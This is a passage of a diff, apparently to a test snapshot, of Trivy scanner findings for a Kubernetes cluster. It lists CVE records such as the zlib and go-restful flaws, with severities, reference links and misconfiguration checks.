"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", + "https://security.netapp.com/advisory/ntap-20220901-0005/", + "https://security.netapp.com/advisory/ntap-20230427-0007/", + "https://support.apple.com/kb/HT213488", + "https://support.apple.com/kb/HT213489", + "https://support.apple.com/kb/HT213490", + "https://support.apple.com/kb/HT213491", + "https://support.apple.com/kb/HT213493", + "https://support.apple.com/kb/HT213494", + "https://ubuntu.com/security/notices/USN-5570-1", + "https://ubuntu.com/security/notices/USN-5570-2", + "https://ubuntu.com/security/notices/USN-5573-1", + "https://www.cve.org/CVERecord?id=CVE-2022-37434", + "https://www.debian.org/security/2022/dsa-5218", + ], + }, + "category": "Vulnerability", + "description": "zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference).", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "heap-based buffer over-read and overflow in inflate() in inflate.c via a large gzip header extra field", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-37434", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "http://seclists.org/fulldisclosure/2022/Oct/37", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "http://seclists.org/fulldisclosure/2022/Oct/38", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "http://seclists.org/fulldisclosure/2022/Oct/41", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "value": "http://seclists.org/fulldisclosure/2022/Oct/42", + }, + { + "type": "URL", + "value": "http://www.openwall.com/lists/oss-security/2022/08/05/2", + }, + { + "type": "URL", + "value": "http://www.openwall.com/lists/oss-security/2022/08/09/1", + }, + { + "type": "URL", + "value": "https://access.redhat.com/errata/RHSA-2022:8291", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2022-37434", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/2116639", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", + }, + { + "type": "URL", + "value": "https://errata.almalinux.org/9/ALSA-2022-8291.html", + }, + { + "type": "URL", + "value": "https://errata.rockylinux.org/RLSA-2022:8291", + }, + { + "type": "URL", + "value": "https://github.com/curl/curl/issues/9271", + }, + { + "type": "URL", + "value": "https://github.com/ivd38/zlib_overflow", + }, + { + "type": "URL", + "value": "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", + }, + { + "type": "URL", + "value": "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", + }, + { + "type": "URL", + "value": "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2022-37434.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2023-1095.html", + }, + { + "type": "URL", + "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220901-0005/", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", + }, + { + "type": "URL", + "value": "https://support.apple.com/kb/HT213488", + }, + { + "type": "URL", + "value": "https://support.apple.com/kb/HT213489", + }, + { + "type": "URL", + "value": "https://support.apple.com/kb/HT213490", + }, + { + "type": "URL", + "value": "https://support.apple.com/kb/HT213491", + }, + { + "type": "URL", + "value": "https://support.apple.com/kb/HT213493", + }, + { + "type": "URL", + "value": "https://support.apple.com/kb/HT213494", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5570-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5570-2", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5573-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-37434", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2022/dsa-5218", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.2.8", - "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2019-11254", - "installedVersion": "v2.2.4", - "packageName": "gopkg.in/yaml.v2", + "fixedVersion": "1.2.12-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2018-25032", + "installedVersion": "1.2.11-r3", + "packageName": "zlib", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-11254", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=18496", - "https://github.com/advisories/GHSA-wxc4-f4m6-wwqv", - "https://github.com/go-yaml/yaml/commit/53403b58ad1b561927d19068c655246f2db79d48", - "https://github.com/go-yaml/yaml/pull/555", - "https://github.com/kubernetes/kubernetes/issues/89535", - "https://github.com/kubernetes/kubernetes/pull/87467/commits/b86df2bec4f377afc0ca03482ffad2f0a49a83b8", - "https://groups.google.com/d/msg/kubernetes-announce/ALL9s73E5ck/4yHe8J-PBAAJ", - "https://groups.google.com/forum/#!topic/kubernetes-security-announce/wuwEwZigXBc", - "https://linux.oracle.com/cve/CVE-2019-11254.html", - "https://linux.oracle.com/errata/ELSA-2020-5653.html", - "https://nvd.nist.gov/vuln/detail/CVE-2019-11254", - "https://pkg.go.dev/vuln/GO-2020-0036", - "https://security.netapp.com/advisory/ntap-20200413-0003/", - "https://www.cve.org/CVERecord?id=CVE-2019-11254", + "http://seclists.org/fulldisclosure/2022/May/33", + "http://seclists.org/fulldisclosure/2022/May/35", + "http://seclists.org/fulldisclosure/2022/May/38", + "http://www.openwall.com/lists/oss-security/2022/03/25/2", + "http://www.openwall.com/lists/oss-security/2022/03/26/1", + "https://access.redhat.com/errata/RHSA-2022:8420", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", + "https://access.redhat.com/security/cve/CVE-2018-25032", + "https://bugzilla.redhat.com/2067945", + "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", + "https://errata.almalinux.org/9/ALSA-2022-8420.html", + "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", + "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", + "https://github.com/madler/zlib/issues/605", + "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", + "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", + "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", + "https://linux.oracle.com/cve/CVE-2018-25032.html", + "https://linux.oracle.com/errata/ELSA-2022-9565.html", + "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", + "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", + "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", + "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", + "https://security.gentoo.org/glsa/202210-42", + "https://security.netapp.com/advisory/ntap-20220526-0009/", + "https://security.netapp.com/advisory/ntap-20220729-0004/", + "https://support.apple.com/kb/HT213255", + "https://support.apple.com/kb/HT213256", + "https://support.apple.com/kb/HT213257", + "https://ubuntu.com/security/notices/USN-5355-1", + "https://ubuntu.com/security/notices/USN-5355-2", + "https://ubuntu.com/security/notices/USN-5359-1", + "https://ubuntu.com/security/notices/USN-5359-2", + "https://ubuntu.com/security/notices/USN-5739-1", + "https://www.cve.org/CVERecord?id=CVE-2018-25032", + "https://www.debian.org/security/2022/dsa-5111", + "https://www.openwall.com/lists/oss-security/2022/03/24/1", + "https://www.openwall.com/lists/oss-security/2022/03/28/1", + "https://www.openwall.com/lists/oss-security/2022/03/28/3", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, "category": "Vulnerability", - "description": "The Kubernetes API Server component in versions 1.1-1.14, and versions prior to 1.15.10, 1.16.7 and 1.17.3 allows an authorized user who sends malicious YAML payloads to cause the kube-apiserver to consume excessive CPU cycles while parsing YAML.", + "description": "zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches.", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "kubernetes: Denial of service in API server via crafted YAML payloads by authorized users", + "name": "A flaw found in zlib when compressing (not decompressing) certain inputs", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-11254", + "value": "https://avd.aquasec.com/nvd/cve-2018-25032", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-11254", + "value": "http://seclists.org/fulldisclosure/2022/May/33", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=18496", + "value": "http://seclists.org/fulldisclosure/2022/May/35", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-wxc4-f4m6-wwqv", + "value": "http://seclists.org/fulldisclosure/2022/May/38", }, { "type": "URL", - "value": "https://github.com/go-yaml/yaml/commit/53403b58ad1b561927d19068c655246f2db79d48", + "value": "http://www.openwall.com/lists/oss-security/2022/03/25/2", }, { "type": "URL", - "value": "https://github.com/go-yaml/yaml/pull/555", + "value": "http://www.openwall.com/lists/oss-security/2022/03/26/1", }, { "type": "URL", - "value": "https://github.com/kubernetes/kubernetes/issues/89535", + "value": "https://access.redhat.com/errata/RHSA-2022:8420", }, { "type": "URL", - "value": "https://github.com/kubernetes/kubernetes/pull/87467/commits/b86df2bec4f377afc0ca03482ffad2f0a49a83b8", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", }, { "type": "URL", - "value": "https://groups.google.com/d/msg/kubernetes-announce/ALL9s73E5ck/4yHe8J-PBAAJ", + "value": "https://access.redhat.com/security/cve/CVE-2018-25032", }, { "type": "URL", - "value": "https://groups.google.com/forum/#!topic/kubernetes-security-announce/wuwEwZigXBc", + "value": "https://bugzilla.redhat.com/2067945", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-11254.html", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-5653.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11254", + "value": "https://errata.almalinux.org/9/ALSA-2022-8420.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2020-0036", + "value": "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200413-0003/", + "value": "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-11254", + "value": "https://github.com/madler/zlib/issues/605", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "0.20.0-alpha.2", - "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2020-8565", - "installedVersion": "v0.17.1", - "packageName": "k8s.io/client-go", - "references": [ - "https://access.redhat.com/security/cve/CVE-2020-8565", - "https://github.com/advisories/GHSA-8cfg-vx93-jvxw", - "https://github.com/kubernetes/kubernetes/commit/e99df0e5a75eb6e86123b56d53e9b7ca0fd00419", - "https://github.com/kubernetes/kubernetes/issues/95623", - "https://github.com/kubernetes/kubernetes/pull/95316", - "https://groups.google.com/g/kubernetes-announce/c/ScdmyORnPDk", - "https://groups.google.com/g/kubernetes-security-discuss/c/vm-HcrFUOCs/m/36utxAM5CwAJ", - "https://nvd.nist.gov/vuln/detail/CVE-2020-8565", - "https://pkg.go.dev/vuln/GO-2021-0064", - "https://www.cve.org/CVERecord?id=CVE-2020-8565", - ], - }, - "category": "Vulnerability", - "description": "In Kubernetes, if the logging level is set to at least 9, authorization and bearer tokens will be written to log files. This can occur both in API server logs and client tool output like kubectl. This affects <= v1.19.3, <= v1.18.10, <= v1.17.13, < v1.20.0-alpha2.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "kubernetes: Incomplete fix for CVE-2019-11250 allows for token leak in logs when logLevel >= 9", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-8565", + "value": "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-8565", + "value": "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-8cfg-vx93-jvxw", + "value": "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", }, { "type": "URL", - "value": "https://github.com/kubernetes/kubernetes/commit/e99df0e5a75eb6e86123b56d53e9b7ca0fd00419", + "value": "https://linux.oracle.com/cve/CVE-2018-25032.html", }, { "type": "URL", - "value": "https://github.com/kubernetes/kubernetes/issues/95623", + "value": "https://linux.oracle.com/errata/ELSA-2022-9565.html", }, { "type": "URL", - "value": "https://github.com/kubernetes/kubernetes/pull/95316", + "value": "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", }, { "type": "URL", - "value": "https://groups.google.com/g/kubernetes-announce/c/ScdmyORnPDk", + "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", }, { "type": "URL", - "value": "https://groups.google.com/g/kubernetes-security-discuss/c/vm-HcrFUOCs/m/36utxAM5CwAJ", + "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8565", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0064", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-8565", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202210-42", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220526-0009/", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", + }, + { + "type": "URL", + "value": "https://support.apple.com/kb/HT213255", + }, + { + "type": "URL", + "value": "https://support.apple.com/kb/HT213256", + }, + { + "type": "URL", + "value": "https://support.apple.com/kb/HT213257", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5355-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5355-2", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5359-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5359-2", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5739-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-25032", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2022/dsa-5111", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/03/24/1", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/03/28/1", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/03/28/3", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { @@ -53008,704 +53098,781 @@ commonly used by applications.", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0040", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "2.16.0+incompatible", + "foundIn": "Target: 'metrics-sidecar' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-1996", + "installedVersion": "v2.15.0+incompatible", + "packageName": "github.com/emicklei/go-restful", "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0040", + "https://access.redhat.com/security/cve/CVE-2022-1996", + "https://github.com/advisories/GHSA-r48q-9g5r-8q2h", + "https://github.com/emicklei/go-restful/commit/926662532deb450272956c7bc573978464aae74e", + "https://github.com/emicklei/go-restful/commit/f292efff46ae17e9d104f865a60a39a2ae9402f1", + "https://github.com/emicklei/go-restful/commit/fd3c327a379ce08c68ef18765bdc925f5d9bad10", + "https://github.com/emicklei/go-restful/issues/489", + "https://huntr.dev/bounties/be837427-415c-4d8c-808b-62ce20aa84f1", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/575BLJ3Y2EQBRNTFR2OSQQ6L2W6UCST3/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OBDD3Q23RCGAGHIXUCWBU6N3S4RNAKXB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SO5QC2JFW2PXBWAE27OYYYL5SPFUBHTY/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W56PP46JVZEKCANBKXFKRVSBBRRMCY6V/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZGQKWD6SE75PFBPFVSZYAKAVXKBZXKWS/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1996", + "https://pkg.go.dev/vuln/GO-2022-0619", + "https://security.netapp.com/advisory/ntap-20220923-0005/", + "https://www.cve.org/CVERecord?id=CVE-2022-1996", ], }, - "category": "Misconfiguration", - "description": "Disable profiling, if not needed.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Edit the Scheduler pod specification file /etc/kubernetes/manifests/kube-scheduler.yaml file on the Control Plane node and set the below parameter.", - "name": "Ensure that the --profiling argument is set to false(Ensure that the --profiling argument is set to false)", + "category": "Vulnerability", + "description": "Authorization Bypass Through User-Controlled Key in GitHub repository emicklei/go-restful prior to v3.8.0.", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", + "mitigation": undefined, + "name": "Authorization Bypass Through User-Controlled Key", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0040", + "value": "https://avd.aquasec.com/nvd/cve-2022-1996", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://access.redhat.com/security/cve/CVE-2022-1996", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", - ], - }, - "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", + "value": "https://github.com/advisories/GHSA-r48q-9g5r-8q2h", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://github.com/emicklei/go-restful/commit/926662532deb450272956c7bc573978464aae74e", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", - ], - }, - "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "https://github.com/emicklei/go-restful/commit/f292efff46ae17e9d104f865a60a39a2ae9402f1", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "value": "https://github.com/emicklei/go-restful/commit/fd3c327a379ce08c68ef18765bdc925f5d9bad10", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV009", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv009", - ], - }, - "category": "Misconfiguration", - "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", - "name": "Access to host network(Pod 'kube-scheduler-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv009", + "value": "https://github.com/emicklei/go-restful/issues/489", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://huntr.dev/bounties/be837427-415c-4d8c-808b-62ce20aa84f1", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/575BLJ3Y2EQBRNTFR2OSQQ6L2W6UCST3/", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OBDD3Q23RCGAGHIXUCWBU6N3S4RNAKXB/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SO5QC2JFW2PXBWAE27OYYYL5SPFUBHTY/", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", - ], - }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit 